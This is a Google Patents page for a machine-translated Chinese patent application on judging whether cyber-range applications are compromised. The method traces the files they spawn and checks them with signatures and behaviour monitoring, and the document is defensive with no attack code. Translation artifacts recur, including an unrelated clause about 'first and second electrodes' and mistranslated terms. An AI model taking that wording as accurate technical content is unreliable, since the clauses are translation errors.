CN111027062A - Assessment method and device for application collapse state of target range - Google Patents
Assessment method and device for application collapse state of target range Download PDFInfo
- Publication number
- CN111027062A CN111027062A CN201910248280.0A CN201910248280A CN111027062A CN 111027062 A CN111027062 A CN 111027062A CN 201910248280 A CN201910248280 A CN 201910248280A CN 111027062 A CN111027062 A CN 111027062A
- Authority
- CN
- China
- Prior art keywords
- file
- malicious
- application
- detected
- derived
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
Abstract
The embodiment of the invention discloses a method and a device for evaluating a target range application collapse state, which relate to the technical field of network security and do not need to monitor all application services, thereby saving system resources and comprising the following steps: when the application generates a derivative file, tracing the creation process of the derivative file, and acquiring an application name and a system resource identifier corresponding to the creation process; and analyzing the derived file and judging whether the derived file has a malicious attribute, if so, generating a relevant application trapped event based on the application name and the system resource identifier. The state of the target in the target range is analyzed and evaluated through monitoring and analyzing the derivative files.
Description
Technical Field
The invention relates to the technical field of network security, in particular to a method and a device for evaluating a target range application collapse state.
Background
The network shooting range needs to accurately count and evaluate the attack and defense results. Typically, the shooting range is used to monitor whether the target is attacked or not to evaluate the attack or defense situation. Due to the multitask and multiprocess property of the operating system, the application service which is damaged by the attack is difficult to accurately and efficiently locate from a plurality of application services. The traditional method generates huge invalid data for monitoring the service, causes huge interference for judging and positioning the attack, not only influences the performance of a target range, but also generates huge storage cost burden.
Disclosure of Invention
In view of this, embodiments of the present invention provide a method and an apparatus for evaluating a target application failure state, so as to determine whether a relevant application is attacked or not by analyzing whether a derived file generated by the application has a malicious attribute.
In a first aspect, an embodiment of the present invention provides a method for evaluating a target range application failure state, including:
when the application generates a derivative file, tracing the creation process of the derivative file, and acquiring an application name and a system resource identifier corresponding to the creation process;
and analyzing the derived file and judging whether the derived file has a malicious attribute, if so, generating a relevant application trapped event based on the application name and the system resource identifier.
According to a specific implementation manner of the embodiment of the present invention, the method further includes: if the derived file is judged to have no malicious attribute, the subfiles created by the derived file are further monitored, the subfiles are analyzed, whether the subfiles have the malicious attribute or not is judged, and if the subfiles have the malicious attribute, the relevant application attacked and trapped events are generated based on the application name and the system resource identification.
According to a specific implementation manner of the embodiment of the present invention, the analyzing the derived file or the subfile and determining whether the derived file or the subfile has a malicious property includes:
taking the derived file or the subfile as a file to be detected;
searching and judging whether the file to be detected has malicious attributes by using the static sequence characteristics; alternatively, the first and second electrodes may be,
and monitoring and judging whether the file to be detected has malicious attributes by utilizing the dynamic behavior.
According to a specific implementation manner of the embodiment of the present invention, the determining whether the file to be detected has the malicious property by using the dynamic behavior monitoring includes:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
In a second aspect, an embodiment of the present invention provides an apparatus for evaluating a target application miss state, including:
the application tracing module is used for tracing the creation process of the derivative file when the derivative file is generated by the application, and acquiring an application name and a system resource identifier corresponding to the creation process;
and the application evaluation module is used for analyzing the derived file and judging whether the derived file has a malicious attribute, and if the derived file has the malicious attribute, generating a relevant application trapped event based on the application name and the system resource identifier.
According to a specific implementation manner of the embodiment of the present invention, the application evaluation module is further configured to: if the derived file is judged to have no malicious attribute, the subfiles created by the derived file are further monitored, the subfiles are analyzed, whether the subfiles have the malicious attribute or not is judged, and if the subfiles have the malicious attribute, the relevant application attacked and trapped events are generated based on the application name and the system resource identification.
According to a specific implementation manner of the embodiment of the present invention, the analyzing the derived file or the subfile and determining whether the derived file or the subfile has a malicious property is specifically configured to:
taking the derived file or the subfile as a file to be detected;
searching and judging whether the file to be detected has malicious attributes by using the static sequence characteristics; alternatively, the first and second electrodes may be,
and monitoring and judging whether the file to be detected has malicious attributes by utilizing the dynamic behavior.
According to a specific implementation manner of the embodiment of the present invention, the determining whether the file to be detected has the malicious property by using the dynamic behavior monitoring includes:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
The method and the device for evaluating the application collapse state of the target range, provided by the embodiment of the invention, are different from the traditional scheme for monitoring all applications, but the derived files of the target are collected, the derived files are analyzed to judge whether the malicious attributes exist, if the malicious attributes exist, the application services related to the derived files are considered to be collapsed, and related collapsed events are generated.
In a network target range, a plurality of targets exist, the number of the targets is extremely large in most cases, and it is difficult to monitor all the targets and evaluate the collapse state of the targets. According to the method and the device, the derived files of the application service are analyzed, and when the derived files are judged to have malicious attributes, the related application service is judged to be attacked, so that huge system resource consumption is reduced, and the requirement on storage capacity is reduced; and because a centralized monitoring means is adopted, the monitoring accuracy is greatly improved, and the attacked application service and related files can be accurately positioned.
Drawings
In order to more clearly illustrate the embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below, it is obvious that the drawings in the following description are only some embodiments of the present invention, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a flowchart illustrating an embodiment of a method for evaluating a target application miss status according to the present invention;
FIG. 2 is a flowchart illustrating a method for evaluating a miss status of an application in a shooting range according to another embodiment of the present invention;
fig. 3 is a schematic structural diagram of an evaluation apparatus for a target range application collapse state according to an embodiment of the present invention.
Detailed Description
Embodiments of the present invention will be described in detail below with reference to the accompanying drawings.
It should be understood that the described embodiments are only some embodiments of the invention, and not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present invention.
In order to better describe the related embodiments of the present invention, the related words are explained as follows:
network shooting range: the network target range is an important infrastructure aiming at network attack and defense drilling and network new technology evaluation and is used for improving the stability, safety and performance of a network and an information system;
target: a target generally refers to a portion of an application service or a file of an appointment running on a network range operating system.
In a first aspect, an embodiment of the present invention provides a method for evaluating a target range application collapse state, where whether an application is collapsed or not is determined by monitoring and analyzing whether a derived file has a malicious attribute, so that not only can system resources be saved, but also a collapsed event can be accurately located.
Fig. 1 is a flowchart of an embodiment of a method for evaluating a target range application collapse state according to the present invention, including:
s101: when the application generates a derivative file, tracing the creation process of the derivative file, and acquiring an application name and a system resource identifier corresponding to the creation process;
s102: and analyzing the derived file and judging whether the derived file has a malicious attribute, if so, generating a relevant application trapped event based on the application name and the system resource identifier.
Preferably, the analyzing the derived file and determining whether the derived file has malicious attributes includes but is not limited to:
taking the derived file as a file to be detected;
searching and judging whether the file to be detected has malicious attributes by using the static sequence characteristics; alternatively, the first and second electrodes may be,
and monitoring and judging whether the file to be detected has malicious attributes by utilizing the dynamic behavior.
Preferably, the determining whether the file to be detected has malicious attributes by using dynamic behavior monitoring includes, but is not limited to:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
It should be noted that the creating process of the traceable derivative file and the operation of obtaining the application name and the system resource identifier corresponding to the creating process may be performed when the application generates the related derivative file, or after judging that the derivative file has the malicious attribute, the traceable analysis is performed on the application service corresponding to the derivative file, and a person skilled in the art selects a specific manner as needed, which is not limited herein.
In the embodiment, when the application generates the derivative file, whether the relevant derivative file has the malicious attribute is collected and analyzed, if the malicious attribute exists, the application service information is traced, the attacked event is generated based on the application service information, and the attacked event is provided for the shooting range collection and evaluation system to be used for scale evaluation of the attacked application and the attacked system.
Fig. 2 is a flowchart illustrating a method for evaluating a target range application collapse state according to another embodiment of the present invention, including:
s201: when the application generates a derivative file f1, the creation process proc1 of the source-tracing derivative file f1 obtains an application name app1 and a system resource identifier sys1 corresponding to the creation process proc 1.
Wherein, the range is used as the entrance for monitoring the attack of the target by monitoring the derivative file f 1. The derivative file f1 includes but is not limited to: vbs, exe, sh, etc. The system resource identification sys1 includes but is not limited to: systems ip, uuid, etc.
S202: and taking the derivative file f1 as a file to be detected.
S203: and searching and judging whether the file to be detected has the malicious attribute by using the static sequence feature, if so, executing S206, and if not, executing S204.
The searching and judging whether the file to be detected has the malicious attribute by using the static sequence feature specifically includes but is not limited to: determine if the document MD5 is a known threat document, extract the underlying structural features of the document to determine if it is a known threat family, etc.
S204: and (4) utilizing dynamic behavior monitoring to judge whether the file to be detected has the malicious attribute, if so, executing S206, and if not, executing S205.
More specifically, the determining, by using dynamic behavior monitoring, whether the file to be detected has a malicious attribute includes, but is not limited to:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
S205: the subfile created by the derivative file f1 is monitored, and the subfile is regarded as the file to be detected, and the process proceeds to S203.
S206: and generating an attack event of the application app1 corresponding to sys1proc 1.
More preferably, if the subfile does not have the malicious attribute in S205, the subfile created by the subfile is acquired, and S203 is continuously executed until it is determined that the malicious attribute exists or the related subfile does not exist, and the process is ended.
Specifically, an embodiment of the present invention provides an embodiment of a method for evaluating a target range application collapse state in a specific scenario, where the method includes:
the assumed scene is as follows: when an attacker in a shooting range environment utilizes a vulnerability of a certain application (sever1), a Trojan file is derived, the derived file does not have malicious properties, but the derived file is downloaded through a remote request after running to obtain a subfile containing viruses.
In the embodiment, the derived file is searched through the static sequence characteristics, and no malicious attribute is found; when the derived file runs, finding that the derived file has a network access behavior, but not finding and determining a malicious behavior; after the derivative file remotely downloads the subfiles, the subfiles are retrieved through static sequence characteristics, and malicious attributes are immediately obtained; in this embodiment, the server1 is derived by tracing the related derivative file, and the process number and the application service information of the server1 are recorded.
In this embodiment, when it cannot be determined whether the derived file has a malicious attribute, whether the derived file creates a related subfile or a subfile of the subfile is monitored, whether the subfile has the malicious attribute is further determined, and if the subfile has the malicious attribute, an application name and a system resource identifier of a related application are obtained through tracing the derived file, and an attacked and trapped event of the application is further generated. The embodiment can locate the attacked service and the attacked file by using less system resources.
In a second aspect, an embodiment of the present invention provides an apparatus for evaluating a target range application collapse state, where the apparatus determines whether an application is collapsed by monitoring and analyzing whether a derived file has a malicious attribute, so that system resources can be saved and a collapsed event can be accurately located.
Fig. 3 is a schematic structural diagram of an embodiment of an apparatus for evaluating a target range application collapse state according to the present invention, where the apparatus of the embodiment may include:
the application tracing module 301 is configured to trace a creation process of a derivative file when an application generates the derivative file, and obtain an application name and a system resource identifier corresponding to the creation process;
the application evaluation module 302 is configured to analyze the derived file and determine whether the derived file has a malicious attribute, and if the derived file has the malicious attribute, generate a relevant application trapped event based on the application name and the system resource identifier.
Preferably, the application evaluation module is further configured to: if the derived file is judged to have no malicious attribute, the subfiles created by the derived file are further monitored, the subfiles are analyzed, whether the subfiles have the malicious attribute or not is judged, and if the subfiles have the malicious attribute, the relevant application attacked and trapped events are generated based on the application name and the system resource identification.
Preferably, the analyzing the derived file or the subfile and determining whether the derived file or the subfile has the malicious property are specifically configured to:
taking the derived file or the subfile as a file to be detected;
searching and judging whether the file to be detected has malicious attributes by using the static sequence characteristics; alternatively, the first and second electrodes may be,
and monitoring and judging whether the file to be detected has malicious attributes by utilizing the dynamic behavior.
Preferably, the determining, by using dynamic behavior monitoring, whether the file to be detected has a malicious attribute includes:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
When the device generates the derived file by the application, whether the related derived file has the malicious attribute or not is acquired and analyzed, if the malicious attribute exists, the application service information is traced, the attacked event is generated based on the application service information, and the attacked event is provided for the shooting range acquisition and evaluation system to be used for scale evaluation of the attacked application and the system.
It is noted that, herein, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Also, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other identical elements in a process, method, article, or apparatus that comprises the element.
All the embodiments in the present specification are described in a related manner, and the same and similar parts among the embodiments may be referred to each other, and each embodiment focuses on the differences from the other embodiments.
In particular, as for the apparatus embodiment, since it is substantially similar to the method embodiment, the description is relatively simple, and for the relevant points, reference may be made to the partial description of the method embodiment.
For convenience of description, the above devices are described separately in terms of functional division into various units/modules. Of course, the functionality of the units/modules may be implemented in one or more software and/or hardware implementations of the invention.
It will be understood by those skilled in the art that all or part of the processes of the methods of the embodiments described above can be implemented by a computer program, which can be stored in a computer-readable storage medium, and when executed, can include the processes of the embodiments of the methods described above. The storage medium may be a magnetic disk, an optical disk, a Read-Only Memory (ROM), a Random Access Memory (RAM), or the like.
The above description is only for the specific embodiment of the present invention, but the scope of the present invention is not limited thereto, and any changes or substitutions that can be easily conceived by those skilled in the art within the technical scope of the present invention are included in the scope of the present invention. Therefore, the protection scope of the present invention shall be subject to the protection scope of the claims.
Claims (8)
1. A method for evaluating a target application failure state, comprising:
when the application generates a derivative file, tracing the creation process of the derivative file, and acquiring an application name and a system resource identifier corresponding to the creation process;
and analyzing the derived file and judging whether the derived file has a malicious attribute, if so, generating a relevant application trapped event based on the application name and the system resource identifier.
2. The evaluation method of claim 1, further comprising: if the derived file is judged to have no malicious attribute, the subfiles created by the derived file are further monitored, the subfiles are analyzed, whether the subfiles have the malicious attribute or not is judged, and if the subfiles have the malicious attribute, the relevant application attacked and trapped events are generated based on the application name and the system resource identification.
3. The evaluation method according to claim 1 or 2, wherein the analyzing the derived files or subfiles and determining whether the derived files or subfiles have malicious attributes comprises:
taking the derived file or the subfile as a file to be detected;
searching and judging whether the file to be detected has malicious attributes by using the static sequence characteristics; alternatively, the first and second electrodes may be,
and monitoring and judging whether the file to be detected has malicious attributes by utilizing the dynamic behavior.
4. The evaluation method of claim 3, wherein the determining whether the file to be detected has the malicious property by using the dynamic behavior monitoring comprises:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
5. An apparatus for assessing a miss status of an aperture application, comprising:
the application tracing module is used for tracing the creation process of the derivative file when the derivative file is generated by the application, and acquiring an application name and a system resource identifier corresponding to the creation process;
and the application evaluation module is used for analyzing the derived file and judging whether the derived file has a malicious attribute, and if the derived file has the malicious attribute, generating a relevant application trapped event based on the application name and the system resource identifier.
6. The evaluation apparatus of claim 5, wherein the application evaluation module is further configured to: if the derived file is judged to have no malicious attribute, the subfiles created by the derived file are further monitored, the subfiles are analyzed, whether the subfiles have the malicious attribute or not is judged, and if the subfiles have the malicious attribute, the relevant application attacked and trapped events are generated based on the application name and the system resource identification.
7. The evaluation apparatus according to claim 5 or 6, wherein the analyzing the derived file or subfile and determining whether the derived file or subfile has malicious attributes comprises:
taking the derived file or the subfile as a file to be detected;
searching and judging whether the file to be detected has malicious attributes by using the static sequence characteristics; alternatively, the first and second electrodes may be,
and monitoring and judging whether the file to be detected has malicious attributes by utilizing the dynamic behavior.
8. The evaluation device according to claim 7, wherein the determining whether the file to be detected has the malicious property by using the dynamic behavior monitoring comprises:
monitoring whether the hidden attribute of the file to be detected is deleted or not;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the files to be detected have suspicious behavior attributes configured by the collecting system;
and if one or more of the behaviors occur in combination, judging that the file to be detected has malicious attributes.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910248280.0A CN111027062A (en) | 2019-03-29 | 2019-03-29 | Assessment method and device for application collapse state of target range |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910248280.0A CN111027062A (en) | 2019-03-29 | 2019-03-29 | Assessment method and device for application collapse state of target range |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN111027062A true CN111027062A (en) | 2020-04-17 |
Family
ID=70199509
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201910248280.0A Pending CN111027062A (en) | 2019-03-29 | 2019-03-29 | Assessment method and device for application collapse state of target range |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN111027062A (en) |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN112270085A (en) * | 2020-10-26 | 2021-01-26 | 广州锦行网络科技有限公司 | Dynamic design method of 3D network shooting range |
Citations (15)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20110219449A1 (en) * | 2010-03-04 | 2011-09-08 | St Neitzel Michael | Malware detection method, system and computer program product |
| US20130097706A1 (en) * | 2011-09-16 | 2013-04-18 | Veracode, Inc. | Automated behavioral and static analysis using an instrumented sandbox and machine learning classification for mobile security |
| CN103077353A (en) * | 2013-01-24 | 2013-05-01 | 北京奇虎科技有限公司 | Method and device for actively defending rogue program |
| CN103646213A (en) * | 2013-09-26 | 2014-03-19 | 北京神州绿盟信息安全科技股份有限公司 | Method and device for classifying malicious software |
| US20140123280A1 (en) * | 2012-10-30 | 2014-05-01 | Gabriel Kedma | Runtime detection of self-replicating malware |
| CN103839003A (en) * | 2012-11-22 | 2014-06-04 | 腾讯科技(深圳)有限公司 | Malicious file detection method and device |
| CN103902908A (en) * | 2013-12-25 | 2014-07-02 | 武汉安天信息技术有限责任公司 | Method and system for detecting malicious codes of Android reinforced applications |
| CN103970766A (en) * | 2013-01-29 | 2014-08-06 | 腾讯科技(深圳)有限公司 | Data file handling method, device and terminal |
| CN104732140A (en) * | 2015-04-13 | 2015-06-24 | 成都睿峰科技有限公司 | Program data processing method |
| CN104796416A (en) * | 2015-04-08 | 2015-07-22 | 中国科学院信息工程研究所 | Botnet simulation method and botnet simulation system |
| KR101593183B1 (en) * | 2014-08-22 | 2016-02-15 | 한국전자통신연구원 | Automatic act expression apparatus and method of for analysis of malicious code in a virtual environment |
| US20160285914A1 (en) * | 2015-03-25 | 2016-09-29 | Fireeye, Inc. | Exploit detection system |
| CN108021428A (en) * | 2017-12-05 | 2018-05-11 | 华迪计算机集团有限公司 | A kind of method and system that network target range is realized based on Docker |
| WO2018123061A1 (en) * | 2016-12-28 | 2018-07-05 | デジタルア-ツ株式会社 | Information processing device and program |
| CN108334781A (en) * | 2018-03-07 | 2018-07-27 | 腾讯科技(深圳)有限公司 | Method for detecting virus, device, computer readable storage medium and computer equipment |
-
2019
- 2019-03-29 CN CN201910248280.0A patent/CN111027062A/en active Pending
Patent Citations (15)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20110219449A1 (en) * | 2010-03-04 | 2011-09-08 | St Neitzel Michael | Malware detection method, system and computer program product |
| US20130097706A1 (en) * | 2011-09-16 | 2013-04-18 | Veracode, Inc. | Automated behavioral and static analysis using an instrumented sandbox and machine learning classification for mobile security |
| US20140123280A1 (en) * | 2012-10-30 | 2014-05-01 | Gabriel Kedma | Runtime detection of self-replicating malware |
| CN103839003A (en) * | 2012-11-22 | 2014-06-04 | 腾讯科技(深圳)有限公司 | Malicious file detection method and device |
| CN103077353A (en) * | 2013-01-24 | 2013-05-01 | 北京奇虎科技有限公司 | Method and device for actively defending rogue program |
| CN103970766A (en) * | 2013-01-29 | 2014-08-06 | 腾讯科技(深圳)有限公司 | Data file handling method, device and terminal |
| CN103646213A (en) * | 2013-09-26 | 2014-03-19 | 北京神州绿盟信息安全科技股份有限公司 | Method and device for classifying malicious software |
| CN103902908A (en) * | 2013-12-25 | 2014-07-02 | 武汉安天信息技术有限责任公司 | Method and system for detecting malicious codes of Android reinforced applications |
| KR101593183B1 (en) * | 2014-08-22 | 2016-02-15 | 한국전자통신연구원 | Automatic act expression apparatus and method of for analysis of malicious code in a virtual environment |
| US20160285914A1 (en) * | 2015-03-25 | 2016-09-29 | Fireeye, Inc. | Exploit detection system |
| CN104796416A (en) * | 2015-04-08 | 2015-07-22 | 中国科学院信息工程研究所 | Botnet simulation method and botnet simulation system |
| CN104732140A (en) * | 2015-04-13 | 2015-06-24 | 成都睿峰科技有限公司 | Program data processing method |
| WO2018123061A1 (en) * | 2016-12-28 | 2018-07-05 | デジタルア-ツ株式会社 | Information processing device and program |
| CN108021428A (en) * | 2017-12-05 | 2018-05-11 | 华迪计算机集团有限公司 | A kind of method and system that network target range is realized based on Docker |
| CN108334781A (en) * | 2018-03-07 | 2018-07-27 | 腾讯科技(深圳)有限公司 | Method for detecting virus, device, computer readable storage medium and computer equipment |
Non-Patent Citations (7)
| Title |
|---|
| DAVID(YU) ZHU 等: "TaintEraser: protecting sensitive data leaks using application-level taint tracking", ACM SIGOPS OPERATING SYSTEMS REVIEW, vol. 45, no. 1, pages 142 - 154 * |
| ZHIQIANG LIN 等: "Reverse Engineering Input Syntactic Structure from Program Execution and Its Application", IEEE TRANSACTIONS ON SOFTWARE ENGINEERING, vol. 36, no. 5, pages 688 - 703, XP011295191 * |
| 张翔飞 等: "基于多层次行为差异的沙箱逃逸检测及其实现", 计算机工程与应用, vol. 54, no. 13, pages 111 - 116 * |
| 房鼎益 等: "一种抗语义攻击的虚拟化软件保护方法", 工程科学与技术, vol. 49, no. 01, pages 159 - 168 * |
| 曹立铭 等: "私有云平台上的虚拟机进程安全检测", 计算机应用研究, vol. 30, no. 05, pages 1495 - 1499 * |
| 梁鸿生 等: "文件监控的虚拟设备驱动程序开发", 现代电子技术, no. 11, pages 47 - 49 * |
| 郑生军 等: "基于虚拟执行技术的高级恶意软件攻击在线检测系统", 信息网络安全, no. 01, pages 29 - 33 * |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN112270085A (en) * | 2020-10-26 | 2021-01-26 | 广州锦行网络科技有限公司 | Dynamic design method of 3D network shooting range |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Tang et al. | Nodemerge: Template based efficient data reduction for big-data causality analysis | |
| KR100938672B1 (en) | The method and apparatus for detecting dll inserted by malicious code | |
| KR101246623B1 (en) | Apparatus and method for detecting malicious applications | |
| CN110213207B (en) | Network security defense method and equipment based on log analysis | |
| US7913233B2 (en) | Performance analyzer | |
| CN102413142A (en) | Active defense method based on cloud platform | |
| CN112073437B (en) | Multi-dimensional security threat event analysis method, device, equipment and storage medium | |
| KR20130134790A (en) | Method and system for storing the integrity information of application, method and system for checking the integrity of application | |
| CN105095759A (en) | File detection method and device | |
| CN112131571B (en) | Threat tracing method and related equipment | |
| CN111078513A (en) | Log processing method, device, equipment, storage medium and log alarm system | |
| CN112685682A (en) | Method, device, equipment and medium for identifying forbidden object of attack event | |
| CN114528457A (en) | Web fingerprint detection method and related equipment | |
| CN111931185A (en) | Java anti-serialization vulnerability detection method and component | |
| CN105791250B (en) | Application program detection method and device | |
| CN111027062A (en) | Assessment method and device for application collapse state of target range | |
| CN106446687B (en) | Malicious sample detection method and device | |
| CN116155519A (en) | Threat alert information processing method, threat alert information processing device, computer equipment and storage medium | |
| KR101582420B1 (en) | Method and apparatus for checking integrity of processing module | |
| US11763004B1 (en) | System and method for bootkit detection | |
| KR101725395B1 (en) | System and method for analysing a malicious script behavior information based on HTML5 | |
| CN116938605B (en) | Network attack protection method and device, electronic equipment and readable storage medium | |
| CN112395602B (en) | Processing method, device and system for static security feature database | |
| JP7302223B2 (en) | Script detection device, method and program | |
| KR101726360B1 (en) | Method and server for generating suffix tree, method and server for detecting malicious code with using suffix tree |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| CB02 | Change of applicant information | ||
| CB02 | Change of applicant information |
Address after: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Heilongjiang Province (No. 838, Shikun Road) Applicant after: Antan Technology Group Co.,Ltd. Address before: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Harbin, Heilongjiang Province (No. 838, Shikun Road) Applicant before: Harbin Antian Science and Technology Group Co.,Ltd. |